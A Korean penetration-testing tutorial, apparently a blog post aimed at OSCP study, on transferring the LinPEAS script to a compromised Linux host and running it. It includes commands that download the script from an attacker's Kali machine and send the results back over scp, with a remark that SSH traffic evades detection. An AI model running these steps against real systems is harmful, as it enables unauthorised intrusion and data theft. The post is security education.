hhkb
모의해킹

호스트기반모의해킹_33_리눅스 공격 자동화

작성자 : Heehyeon Yoo|2025-12-12
# 모의해킹# Post-Exploitation# Linux# Automation# LinPEAS

1. 개요

매뉴얼한 정보 수집은 정확하지만 시간이 많이 소요된다. OSCP 시험이나 실무의 시간 제약이 있는 환경에서는 자동화 도구를 통해 정보 수집 시간을 단축하고, 놓칠 수 있는 취약점을 빠르게 식별해야 한다.
대표적인 도구로 LinPEAS(Linux Privilege Escalation Awesome Script)가 있다.

2. 파일 전송(File Transfer)

자동화 스크립트를 타겟에서 실행하려면 먼저 파일을 전송해야 한다. 또한, 수집된 결과(Output)를 다시 공격자(Kali)로 가져오는 과정도 필요하다.

2.1 Kali -> Target(공격 도구 전송)

공격자가 Kali를 제어하고 있으므로 서버를 열기 쉽다.

  1. HTTP(가장 간편):
    • Kali: python3 -m http.server 8000
    • Target: wget http://[Kali_IP]:8000/linpeas.sh 또는 curl -O http://[Kali_IP]:8000/linpeas.sh
  2. FTP:
    • Kali: service pure-ftpd start(FTP 서버 가동)
    • Target:
      ftp [Kali_IP]
      > get linpeas.sh
      
  3. SCP(SSH):
    • Target: scp kali@[Kali_IP]:/path/to/linpeas.sh .

2.2 Target -> Kali(결과물 반출)

타겟의 방화벽(Outbound) 정책에 따라 특정 포트가 막혀있을 수 있다.

  1. 연결 가능성 확인(Telnet):
    • telnet [Kali_IP] 21(FTP) 또는 22(SSH) 등으로 아웃바운드 연결이 허용되는지 먼저 테스트한다.
  2. SCP(추천):
    • scp result.txt kali@[Kali_IP]:/home/kali/
    • SSH 트래픽( 암호화)이라 탐지될 확률이 낮고 안정적이다.

3. LinPEAS 활용

LinPEAS는 리눅스 권한 상승을 위해 필요한 거의 모든 정보를 자동으로 스캔해주는 쉘 스크립트다.

3.1 실행 과정

  1. 다운로드:(위의 파일 전송 방법 참고)
  2. 실행 권한 부여:
    • 다운로드 직후에는 실행 권한(x)이 없다.
    • chmod +x linpeas.sh
  3. 실행 및 결과 저장:
    • 콘솔에 출력이 너무 많아 놓치기 쉽다. 반드시 파일로 저장(Redirection)하거나 tee를 사용한다.
    • ./linpeas.sh > result.txt
    • ./linpeas.sh | tee result.txt(화면 출력 + 파일 저장)

3.2 주요 탐지 항목

스크립트 실행 후 "Red/Yellow" 색상으로 표시된 부분은 99% 확률로 권한 상승 취약점이다.

  • System Info: OS 버전, 커널 버전(Kernel Exploit 가능성).
  • User/Group: Sudo 권한, 현재 유저가 속한 그룹.
  • Files:
    • SUID/SGID Files: 권한 상승에 악용 가능한 바이너리 식별.
    • Sensitive Files: /etc/passwd, SSH Keys, Config files 내의 평문 비밀번호(Hardcoded Creds).
  • Software: 설치된 컴파일러(gcc), Sudo 버전, 기타 취약한 서드파티 소프트웨어.

3.3 결과 분석 및 조치

  • 생성된 result.txt를 다시 Kali로 전송(scp)하여 대화형 텍스트 뷰어(less -r result.txt) 등으로 천천히 분석한다.(-r은 컬러 코드 유지).